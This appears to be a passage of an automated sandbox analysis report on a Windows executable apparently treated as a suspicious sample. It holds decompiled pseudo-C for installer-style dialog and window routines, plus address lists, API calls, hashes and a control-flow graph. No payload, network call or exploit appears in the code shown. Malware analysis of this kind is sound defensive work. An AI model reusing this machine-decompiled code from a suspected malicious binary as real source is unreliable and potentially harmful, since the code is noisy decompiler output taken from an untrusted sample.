                                                                                                                      							__eflags =  *0x42a2ec - _t136;
                                                                                                                      							if( *0x42a2ec == _t136) {
                                                                                                                      								_push( *0x423724);
                                                                                                                      							} else {
                                                                                                                      								SendMessageW(_t128, 0x401, 2, _t136);
                                                                                                                      								_push( *0x4216f0);
                                                                                                                      							}
                                                                                                                      							E0040437A();
                                                                                                                      							E004063B0(0x423728, E00403E4D());
                                                                                                                      							E004063D2(0x423728, _t128, _t133,  &(0x423728[lstrlenW(0x423728)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                                                                      							SetWindowTextW(_t128, 0x423728); // executed
                                                                                                                      							_push(_t136);
                                                                                                                      							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                                                                      							__eflags = _t70;
                                                                                                                      							if(_t70 != 0) {
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								__eflags =  *_t133 - _t136;
                                                                                                                      								if( *_t133 == _t136) {
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								__eflags =  *(_t133 + 4) - 5;
                                                                                                                      								if( *(_t133 + 4) != 5) {
                                                                                                                      									DestroyWindow( *0x429218); // executed
                                                                                                                      									 *0x422700 = _t133;
                                                                                                                      									__eflags =  *_t133 - _t136;
                                                                                                                      									if( *_t133 <= _t136) {
                                                                                                                      										goto L58;
                                                                                                                      									}
                                                                                                                      									_t76 = CreateDialogParamW( *0x42a240,  *_t133 +  *0x429220 & 0x0000ffff, _t128,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
                                                                                                                      									__eflags = _t76 - _t136;
                                                                                                                      									 *0x429218 = _t76;
                                                                                                                      									if(_t76 == _t136) {
                                                                                                                      										goto L58;
                                                                                                                      									}
                                                                                                                      									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                                                                      									_push(6);
                                                                                                                      									E00404345(_t76);
                                                                                                                      									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
                                                                                                                      									ScreenToClient(_t128, _t137 + 0x10);
                                                                                                                      									SetWindowPos( *0x429218, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                                                                      									_push(_t136);
                                                                                                                      									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                                                                      									__eflags =  *0x42920c - _t136;
                                                                                                                      									if( *0x42920c != _t136) {
                                                                                                                      										goto L61;
                                                                                                                      									}
                                                                                                                      									ShowWindow( *0x429218, 8);
                                                                                                                      									E00404391(0x405);
                                                                                                                      									goto L58;
                                                                                                                      								}
                                                                                                                      								__eflags =  *0x42a2ec - _t136;
                                                                                                                      								if( *0x42a2ec != _t136) {
                                                                                                                      									goto L61;
                                                                                                                      								}
                                                                                                                      								__eflags =  *0x42a2e0 - _t136;
                                                                                                                      								if( *0x42a2e0 != _t136) {
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								goto L61;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						DestroyWindow( *0x429218);
                                                                                                                      						 *0x42a248 = _t136;
                                                                                                                      						EndDialog(_t128,  *0x421ef8);
                                                                                                                      						goto L58;
                                                                                                                      					} else {
                                                                                                                      						__eflags = _t37 - 1;
                                                                                                                      						if(_t37 != 1) {
                                                                                                                      							L33:
                                                                                                                      							__eflags =  *_t133 - _t136;
                                                                                                                      							if( *_t133 == _t136) {
                                                                                                                      								goto L61;
                                                                                                                      							}
                                                                                                                      							goto L34;
                                                                                                                      						}
                                                                                                                      						_push(0);
                                                                                                                      						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                                                                      						__eflags = _t89;
                                                                                                                      						if(_t89 == 0) {
                                                                                                                      							goto L33;
                                                                                                                      						}
                                                                                                                      						SendMessageW( *0x429218, 0x40f, 0, "true");
                                                                                                                      						__eflags =  *0x42920c;
                                                                                                                      						return 0 |  *0x42920c == 0x00000000;
                                                                                                                      					}
                                                                                                                      				} else {
                                                                                                                      					_t128 = _a4;
                                                                                                                      					_t136 = 0;
                                                                                                                      					if(_t118 == 0x47) {
                                                                                                                      						SetWindowPos( *0x423708, _t128, 0, 0, 0, 0, 0x13);
                                                                                                                      					}
                                                                                                                      					if(_t118 == 5) {
                                                                                                                      						asm("sbb eax, eax");
                                                                                                                      						ShowWindow( *0x423708,  ~(_a12 - 1) & _t118);
                                                                                                                      					}
                                                                                                                      					if(_t118 != 0x40d) {
                                                                                                                      						__eflags = _t118 - 0x11;
                                                                                                                      						if(_t118 != 0x11) {
                                                                                                                      							__eflags = _t118 - 0x111;
                                                                                                                      							if(_t118 != 0x111) {
                                                                                                                      								L26:
                                                                                                                      								return E004043AC(_t118, _a12, _a16);
                                                                                                                      							}
                                                                                                                      							_t135 = _a12 & 0x0000ffff;
                                                                                                                      							_t129 = GetDlgItem(_t128, _t135);
                                                                                                                      							__eflags = _t129 - _t136;
                                                                                                                      							if(_t129 == _t136) {
                                                                                                                      								L13:
                                                                                                                      								__eflags = _t135 - 1;
                                                                                                                      								if(_t135 != 1) {
                                                                                                                      									__eflags = _t135 - 3;
                                                                                                                      									if(_t135 != 3) {
                                                                                                                      										_t130 = 2;
                                                                                                                      										__eflags = _t135 - _t130;
                                                                                                                      										if(_t135 != _t130) {
                                                                                                                      											L25:
                                                                                                                      											SendMessageW( *0x429218, 0x111, _a12, _a16);
                                                                                                                      											goto L26;
                                                                                                                      										}
                                                                                                                      										__eflags =  *0x42a2ec - _t136;
                                                                                                                      										if( *0x42a2ec == _t136) {
                                                                                                                      											_t102 = E0040140B(3);
                                                                                                                      											__eflags = _t102;
                                                                                                                      											if(_t102 != 0) {
                                                                                                                      												goto L26;
                                                                                                                      											}
                                                                                                                      											 *0x421ef8 = 1;
                                                                                                                      											L21:
                                                                                                                      											_push(0x78);
                                                                                                                      											L22:
                                                                                                                      											E0040431E();
                                                                                                                      											goto L26;
                                                                                                                      										}
                                                                                                                      										E0040140B(_t130);
                                                                                                                      										 *0x421ef8 = _t130;
                                                                                                                      										goto L21;
                                                                                                                      									}
                                                                                                                      									__eflags =  *0x40a39c - _t136; // 0x0
                                                                                                                      									if(__eflags <= 0) {
                                                                                                                      										goto L25;
                                                                                                                      									}
                                                                                                                      									_push(0xffffffff);
                                                                                                                      									goto L22;
                                                                                                                      								}
                                                                                                                      								_push(_t135);
                                                                                                                      								goto L22;
                                                                                                                      							}
                                                                                                                      							SendMessageW(_t129, 0xf3, _t136, _t136);
                                                                                                                      							_t106 = IsWindowEnabled(_t129);
                                                                                                                      							__eflags = _t106;
                                                                                                                      							if(_t106 == 0) {
                                                                                                                      								goto L61;
                                                                                                                      							}
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						SetWindowLongW(_t128, _t136, _t136);
                                                                                                                      						return 1;
                                                                                                                      					} else {
                                                                                                                      						DestroyWindow( *0x429218);
                                                                                                                      						 *0x429218 = _a12;
                                                                                                                      						L58:
                                                                                                                      						_t144 =  *0x425728 - _t136; // 0x0
                                                                                                                      						if(_t144 == 0 &&  *0x429218 != _t136) {
                                                                                                                      							ShowWindow(_t128, 0xa);
                                                                                                                      							 *0x425728 = 1;
                                                                                                                      						}
                                                                                                                      						L61:
                                                                                                                      						return 0;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}































                                                                                                                      0x00403e75
                                                                                                                      0x00403e7e
                                                                                                                      0x00403fbf
                                                                                                                      0x00403fc3
                                                                                                                      0x00403fc7
                                                                                                                      0x00403fc9
                                                                                                                      0x00403fce
                                                                                                                      0x00403fd9
                                                                                                                      0x00403fe4
                                                                                                                      0x00403fe9
                                                                                                                      0x00403feb
                                                                                                                      0x00403fed
                                                                                                                      0x00403ff0
                                                                                                                      0x00403ff5
                                                                                                                      0x00404003
                                                                                                                      0x00404010
                                                                                                                      0x00404017
                                                                                                                      0x00404017
                                                                                                                      0x00404018
                                                                                                                      0x00404018
                                                                                                                      0x0040401d
                                                                                                                      0x00404023
                                                                                                                      0x0040402a
                                                                                                                      0x00404030
                                                                                                                      0x00404032
                                                                                                                      0x00404072
                                                                                                                      0x00404077
                                                                                                                      0x0040407c
                                                                                                                      0x0040407c
                                                                                                                      0x00404081
                                                                                                                      0x0040408a
                                                                                                                      0x0040408c
                                                                                                                      0x00404091
                                                                                                                      0x00404097
                                                                                                                      0x0040409b
                                                                                                                      0x0040409b
                                                                                                                      0x004040a0
                                                                                                                      0x004040a6
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004040b1
                                                                                                                      0x004040b7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004040c0
                                                                                                                      0x004040c8
                                                                                                                      0x004040cd
                                                                                                                      0x004040d0
                                                                                                                      0x004040d6
                                                                                                                      0x004040db
                                                                                                                      0x004040de
                                                                                                                      0x004040e4
                                                                                                                      0x004040e9
                                                                                                                      0x004040ec
                                                                                                                      0x004040f2
                                                                                                                      0x004040fa
                                                                                                                      0x00404100
                                                                                                                      0x00404106
                                                                                                                      0x0040410a
                                                                                                                      0x00404111
                                                                                                                      0x00404111
                                                                                                                      0x00404111
                                                                                                                      0x0040411b
                                                                                                                      0x0040412d
                                                                                                                      0x00404139
                                                                                                                      0x0040413e
                                                                                                                      0x00404148
                                                                                                                      0x0040414e
                                                                                                                      0x00404150
                                                                                                                      0x00404155
                                                                                                                      0x00404152
                                                                                                                      0x00404152
                                                                                                                      0x00404152
                                                                                                                      0x00404165
                                                                                                                      0x0040417d
                                                                                                                      0x0040417f
                                                                                                                      0x00404185
                                                                                                                      0x0040419a
                                                                                                                      0x00404187
                                                                                                                      0x00404190
                                                                                                                      0x00404192
                                                                                                                      0x00404192
                                                                                                                      0x004041a0
                                                                                                                      0x004041b1
                                                                                                                      0x004041c7
                                                                                                                      0x004041ce
                                                                                                                      0x004041d4
                                                                                                                      0x004041d8
                                                                                                                      0x004041dd
                                                                                                                      0x004041df
                                                                                                                      0x00000000
                                                                                                                      0x004041e5
                                                                                                                      0x004041e5
                                                                                                                      0x004041e7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004041ed
                                                                                                                      0x004041f1
                                                                                                                      0x00404216
                                                                                                                      0x0040421c
                                                                                                                      0x00404222
                                                                                                                      0x00404224
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040424a
                                                                                                                      0x00404250
                                                                                                                      0x00404252
                                                                                                                      0x00404257
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040425d
                                                                                                                      0x00404260
                                                                                                                      0x00404263
                                                                                                                      0x0040427a
                                                                                                                      0x00404286
                                                                                                                      0x0040429f
                                                                                                                      0x004042a5
                                                                                                                      0x004042a9
                                                                                                                      0x004042ae
                                                                                                                      0x004042b4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004042be
                                                                                                                      0x004042c9
                                                                                                                      0x00000000
                                                                                                                      0x004042c9
                                                                                                                      0x004041f3
                                                                                                                      0x004041f9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004041ff
                                                                                                                      0x00404205
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040420b
                                                                                                                      0x004041df
                                                                                                                      0x004042d6
                                                                                                                      0x004042e2
                                                                                                                      0x004042e9
                                                                                                                      0x00000000
                                                                                                                      0x00404034
                                                                                                                      0x00404034
                                                                                                                      0x00404037
                                                                                                                      0x0040406a
                                                                                                                      0x0040406a
                                                                                                                      0x0040406c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040406c
                                                                                                                      0x00404039
                                                                                                                      0x0040403d
                                                                                                                      0x00404042
                                                                                                                      0x00404044
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00404054
                                                                                                                      0x0040405c
                                                                                                                      0x00000000
                                                                                                                      0x00404062
                                                                                                                      0x00403e90
                                                                                                                      0x00403e90
                                                                                                                      0x00403e94
                                                                                                                      0x00403e99
                                                                                                                      0x00403ea8
                                                                                                                      0x00403ea8
                                                                                                                      0x00403eb1
                                                                                                                      0x00403eba
                                                                                                                      0x00403ec5
                                                                                                                      0x00403ec5
                                                                                                                      0x00403ed1
                                                                                                                      0x00403eed
                                                                                                                      0x00403ef0
                                                                                                                      0x00403f03
                                                                                                                      0x00403f09
                                                                                                                      0x00403fac
                                                                                                                      0x00000000
                                                                                                                      0x00403fb5
                                                                                                                      0x00403f0f
                                                                                                                      0x00403f1c
                                                                                                                      0x00403f1e
                                                                                                                      0x00403f20
                                                                                                                      0x00403f3f
                                                                                                                      0x00403f3f
                                                                                                                      0x00403f42
                                                                                                                      0x00403f47
                                                                                                                      0x00403f4a
                                                                                                                      0x00403f5a
                                                                                                                      0x00403f5b
                                                                                                                      0x00403f5d
                                                                                                                      0x00403f93
                                                                                                                      0x00403fa6
                                                                                                                      0x00000000
                                                                                                                      0x00403fa6
                                                                                                                      0x00403f5f
                                                                                                                      0x00403f65
                                                                                                                      0x00403f7e
                                                                                                                      0x00403f83
                                                                                                                      0x00403f85
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00403f87
                                                                                                                      0x00403f73
                                                                                                                      0x00403f73
                                                                                                                      0x00403f75
                                                                                                                      0x00403f75
                                                                                                                      0x00000000
                                                                                                                      0x00403f75
                                                                                                                      0x00403f68
                                                                                                                      0x00403f6d
                                                                                                                      0x00000000
                                                                                                                      0x00403f6d
                                                                                                                      0x00403f4c
                                                                                                                      0x00403f52
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00403f54
                                                                                                                      0x00000000
                                                                                                                      0x00403f54
                                                                                                                      0x00403f44
                                                                                                                      0x00000000
                                                                                                                      0x00403f44
                                                                                                                      0x00403f2a
                                                                                                                      0x00403f31
                                                                                                                      0x00403f37
                                                                                                                      0x00403f39
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00403f39
                                                                                                                      0x00403ef5
                                                                                                                      0x00000000
                                                                                                                      0x00403ed3
                                                                                                                      0x00403ed9
                                                                                                                      0x00403ee3
                                                                                                                      0x004042ef
                                                                                                                      0x004042ef
                                                                                                                      0x004042f5
                                                                                                                      0x00404302
                                                                                                                      0x00404308
                                                                                                                      0x00404308
                                                                                                                      0x00404312
                                                                                                                      0x00000000
                                                                                                                      0x00404312
                                                                                                                      0x00403ed1

                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA8
                                                                                                                      • ShowWindow.USER32(?), ref: 00403EC5
                                                                                                                      • DestroyWindow.USER32 ref: 00403ED9
                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF5
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403F16
                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F2A
                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403F31
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403FDF
                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403FE9
                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404003
                                                                                                                      • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404054
                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 004040FA
                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 0040411B
                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412D
                                                                                                                      • EnableWindow.USER32(?,?), ref: 00404148
                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040415E
                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00404165
                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040417D
                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404190
                                                                                                                      • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041BA
                                                                                                                      • SetWindowTextW.USER32(?,00423728), ref: 004041CE
                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404302
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                      • String ID: (7B
                                                                                                                      • API String ID: 3282139019-3251261122
                                                                                                                      • Opcode ID: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                                                                                      • Instruction ID: 85a8b1cb5875a9f0130709c86f20b78f231723f1bf47f2e7597622744019d293
                                                                                                                      • Opcode Fuzzy Hash: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                                                                                      • Instruction Fuzzy Hash: 88C1A1B1640200FFDB216F61EE85D2B3BA8EB95305F40053EFA41B21F0CB7959529B6E
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 366 403abe-403ad6 call 40678a 369 403ad8-403ae8 call 4062f7 366->369 370 403aea-403b21 call 40627e 366->370 377 403b44-403b6d call 403d94 call 405d89 369->377 375 403b23-403b34 call 40627e 370->375 376 403b39-403b3f lstrcatW 370->376 375->376 376->377 384 403b73-403b78 377->384 385 403bff-403c07 call 405d89 377->385 384->385 386 403b7e-403ba6 call 40627e 384->386 391 403c15-403c3a LoadImageW 385->391 392 403c09-403c10 call 4063d2 385->392 386->385 393 403ba8-403bac 386->393 395 403cbb-403cc3 call 40140b 391->395 396 403c3c-403c6c RegisterClassW 391->396 392->391 398 403bbe-403bca lstrlenW 393->398 399 403bae-403bbb call 405cae 393->399 407 403cc5-403cc8 395->407 408 403ccd-403cd8 call 403d94 395->408 400 403c72-403cb6 SystemParametersInfoW CreateWindowExW 396->400 401 403d8a 396->401 405 403bf2-403bfa call 405c81 call 4063b0 398->405 406 403bcc-403bda lstrcmpiW 398->406 399->398 400->395 404 403d8c-403d93 401->404 405->385 406->405 411 403bdc-403be6 GetFileAttributesW 406->411 407->404 419 403d61-403d69 call 4054e7 408->419 420 403cde-403cf8 ShowWindow call 40671a 408->420 412 403be8-403bea 411->412 413 403bec-403bed call 405ccd 411->413 412->405 412->413 413->405 425 403d83-403d85 call 40140b 419->425 426 403d6b-403d71 419->426 427 403d04-403d16 GetClassInfoW 420->427 428 403cfa-403cff call 40671a 420->428 425->401 426->407 429 403d77-403d7e call 40140b 426->429 432 403d18-403d28 GetClassInfoW RegisterClassW 427->432 433 403d2e-403d51 DialogBoxParamW call 40140b 427->433 428->427 429->407 432->433 437 403d56-403d5f call 403a0e 433->437 437->404
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E00403ABE(void* __eflags) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				int _v12;
                                                                                                                      				void _v16;
                                                                                                                      				void* __ebx;
                                                                                                                      				void* __edi;
                                                                                                                      				void* __esi;
                                                                                                                      				intOrPtr* _t22;
                                                                                                                      				void* _t30;
                                                                                                                      				void* _t32;
                                                                                                                      				int _t33;
                                                                                                                      				void* _t36;
                                                                                                                      				int _t39;
                                                                                                                      				int _t40;
                                                                                                                      				int _t44;
                                                                                                                      				short _t63;
                                                                                                                      				WCHAR* _t65;
                                                                                                                      				signed char _t69;
                                                                                                                      				WCHAR* _t76;
                                                                                                                      				intOrPtr _t82;
                                                                                                                      				WCHAR* _t87;
                                                                                                                      
                                                                                                                      				_t82 =  *0x42a254;
                                                                                                                      				_t22 = E0040678A(2);
                                                                                                                      				_t90 = _t22;
                                                                                                                      				if(_t22 == 0) {
                                                                                                                      					_t76 = 0x423728;
                                                                                                                      					L"1033" = 0x30;
                                                                                                                      					 *0x437002 = 0x78;
                                                                                                                      					 *0x437004 = 0;
                                                                                                                      					E0040627E(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423728, 0);
                                                                                                                      					__eflags =  *0x423728;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						E0040627E(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x423728, 0);
                                                                                                                      					}
                                                                                                                      					lstrcatW(L"1033", _t76);
                                                                                                                      				} else {
                                                                                                                      					E004062F7(L"1033",  *_t22() & 0x0000ffff);
                                                                                                                      				}
                                                                                                                      				E00403D94(_t78, _t90);
                                                                                                                      				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Standpost";
                                                                                                                      				 *0x42a2e0 =  *0x42a25c & 0x00000020;
                                                                                                                      				 *0x42a2fc = 0x10000;
                                                                                                                      				if(E00405D89(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Standpost") != 0) {
                                                                                                                      					L16:
                                                                                                                      					if(E00405D89(_t98, _t86) == 0) {
                                                                                                                      						E004063D2(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
                                                                                                                      					}
                                                                                                                      					_t30 = LoadImageW( *0x42a240, 0x67, "true", 0, 0, 0x8040); // executed
                                                                                                                      					 *0x429228 = _t30;
                                                                                                                      					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                                                                      						L21:
                                                                                                                      						if(E0040140B(0) == 0) {
                                                                                                                      							_t32 = E00403D94(_t78, __eflags);
                                                                                                                      							__eflags =  *0x42a300;
                                                                                                                      							if( *0x42a300 != 0) {
                                                                                                                      								_t33 = E004054E7(_t32, 0);
                                                                                                                      								__eflags = _t33;
                                                                                                                      								if(_t33 == 0) {
                                                                                                                      									E0040140B("true");
                                                                                                                      									goto L33;
                                                                                                                      								}
                                                                                                                      								__eflags =  *0x42920c;
                                                                                                                      								if( *0x42920c == 0) {
                                                                                                                      									E0040140B(2);
                                                                                                                      								}
                                                                                                                      								goto L22;
                                                                                                                      							}
                                                                                                                      							ShowWindow( *0x423708, 5); // executed
                                                                                                                      							_t39 = E0040671A("RichEd20"); // executed
                                                                                                                      							__eflags = _t39;
                                                                                                                      							if(_t39 == 0) {
                                                                                                                      								E0040671A("RichEd32");
                                                                                                                      							}
                                                                                                                      							_t87 = L"RichEdit20W";
                                                                                                                      							_t40 = GetClassInfoW(0, _t87, 0x4291e0);
                                                                                                                      							__eflags = _t40;
                                                                                                                      							if(_t40 == 0) {
                                                                                                                      								GetClassInfoW(0, L"RichEdit", 0x4291e0);
                                                                                                                      								 *0x429204 = _t87;
                                                                                                                      								RegisterClassW(0x4291e0);
                                                                                                                      							}
                                                                                                                      							_t44 = DialogBoxParamW( *0x42a240,  *0x429220 + 0x00000069 & 0x0000ffff, 0, E00403E6C, 0); // executed
                                                                                                                      							E00403A0E(E0040140B(5), "true");
                                                                                                                      							return _t44;
                                                                                                                      						}
                                                                                                                      						L22:
                                                                                                                      						_t36 = 2;
                                                                                                                      						return _t36;
                                                                                                                      					} else {
                                                                                                                      						_t78 =  *0x42a240;
                                                                                                                      						 *0x4291e4 = E00401000;
                                                                                                                      						 *0x4291f0 =  *0x42a240;
                                                                                                                      						 *0x4291f4 = _t30;
                                                                                                                      						 *0x429204 = 0x40a3b4;
                                                                                                                      						if(RegisterClassW(0x4291e0) == 0) {
                                                                                                                      							L33:
                                                                                                                      							__eflags = 0;
                                                                                                                      							return 0;
                                                                                                                      						}
                                                                                                                      						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                                                                      						 *0x423708 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a240, 0);
                                                                                                                      						goto L21;
                                                                                                                      					}
                                                                                                                      				} else {
                                                                                                                      					_t78 =  *(_t82 + 0x48);
                                                                                                                      					_t92 = _t78;
                                                                                                                      					if(_t78 == 0) {
                                                                                                                      						goto L16;
                                                                                                                      					}
                                                                                                                      					_t76 = 0x4281e0;
                                                                                                                      					E0040627E(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x4281e0, 0);
                                                                                                                      					_t63 =  *0x4281e0; // 0x43
                                                                                                                      					if(_t63 == 0) {
                                                                                                                      						goto L16;
                                                                                                                      					}
                                                                                                                      					if(_t63 == 0x22) {
                                                                                                                      						_t76 = 0x4281e2;
                                                                                                                      						 *((short*)(E00405CAE(0x4281e2, 0x22))) = 0;
                                                                                                                      					}
                                                                                                                      					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                                                                      					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                                                                      						L15:
                                                                                                                      						E004063B0(_t86, E00405C81(_t76));
                                                                                                                      						goto L16;
                                                                                                                      					} else {
                                                                                                                      						_t69 = GetFileAttributesW(_t76);
                                                                                                                      						if(_t69 == 0xffffffff) {
                                                                                                                      							L14:
                                                                                                                      							E00405CCD(_t76);
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						_t98 = _t69 & 0x00000010;
                                                                                                                      						if((_t69 & 0x00000010) != 0) {
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						goto L14;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}
























                                                                                                                      0x00403ac4
                                                                                                                      0x00403acd
                                                                                                                      0x00403ad4
                                                                                                                      0x00403ad6
                                                                                                                      0x00403aea
                                                                                                                      0x00403afc
                                                                                                                      0x00403b05
                                                                                                                      0x00403b0e
                                                                                                                      0x00403b15
                                                                                                                      0x00403b1a
                                                                                                                      0x00403b21
                                                                                                                      0x00403b34
                                                                                                                      0x00403b34
                                                                                                                      0x00403b3f
                                                                                                                      0x00403ad8
                                                                                                                      0x00403ae3
                                                                                                                      0x00403ae3
                                                                                                                      0x00403b44
                                                                                                                      0x00403b4e
                                                                                                                      0x00403b57
                                                                                                                      0x00403b5c
                                                                                                                      0x00403b6d
                                                                                                                      0x00403bff
                                                                                                                      0x00403c07
                                                                                                                      0x00403c10
                                                                                                                      0x00403c10
                                                                                                                      0x00403c26
                                                                                                                      0x00403c2c
                                                                                                                      0x00403c3a
                                                                                                                      0x00403cbb
                                                                                                                      0x00403cc3
                                                                                                                      0x00403ccd
                                                                                                                      0x00403cd2
                                                                                                                      0x00403cd8
                                                                                                                      0x00403d62
                                                                                                                      0x00403d67
                                                                                                                      0x00403d69
                                                                                                                      0x00403d85
                                                                                                                      0x00000000
                                                                                                                      0x00403d85
                                                                                                                      0x00403d6b
                                                                                                                      0x00403d71
                                                                                                                      0x00403d79
                                                                                                                      0x00403d79
                                                                                                                      0x00000000
                                                                                                                      0x00403d71
                                                                                                                      0x00403ce6
                                                                                                                      0x00403cf1
                                                                                                                      0x00403cf6
                                                                                                                      0x00403cf8
                                                                                                                      0x00403cff
                                                                                                                      0x00403cff
                                                                                                                      0x00403d0a
                                                                                                                      0x00403d12
                                                                                                                      0x00403d14
                                                                                                                      0x00403d16
                                                                                                                      0x00403d1f
                                                                                                                      0x00403d22
                                                                                                                      0x00403d28
                                                                                                                      0x00403d28
                                                                                                                      0x00403d47
                                                                                                                      0x00403d58
                                                                                                                      0x00000000
                                                                                                                      0x00403d5d
                                                                                                                      0x00403cc5
                                                                                                                      0x00403cc7
                                                                                                                      0x00000000
                                                                                                                      0x00403c3c
                                                                                                                      0x00403c3c
                                                                                                                      0x00403c48
                                                                                                                      0x00403c52
                                                                                                                      0x00403c58
                                                                                                                      0x00403c5d
                                                                                                                      0x00403c6c
                                                                                                                      0x00403d8a
                                                                                                                      0x00403d8a
                                                                                                                      0x00000000
                                                                                                                      0x00403d8a
                                                                                                                      0x00403c7b
                                                                                                                      0x00403cb6
                                                                                                                      0x00000000
                                                                                                                      0x00403cb6
                                                                                                                      0x00403b73
                                                                                                                      0x00403b73
                                                                                                                      0x00403b76
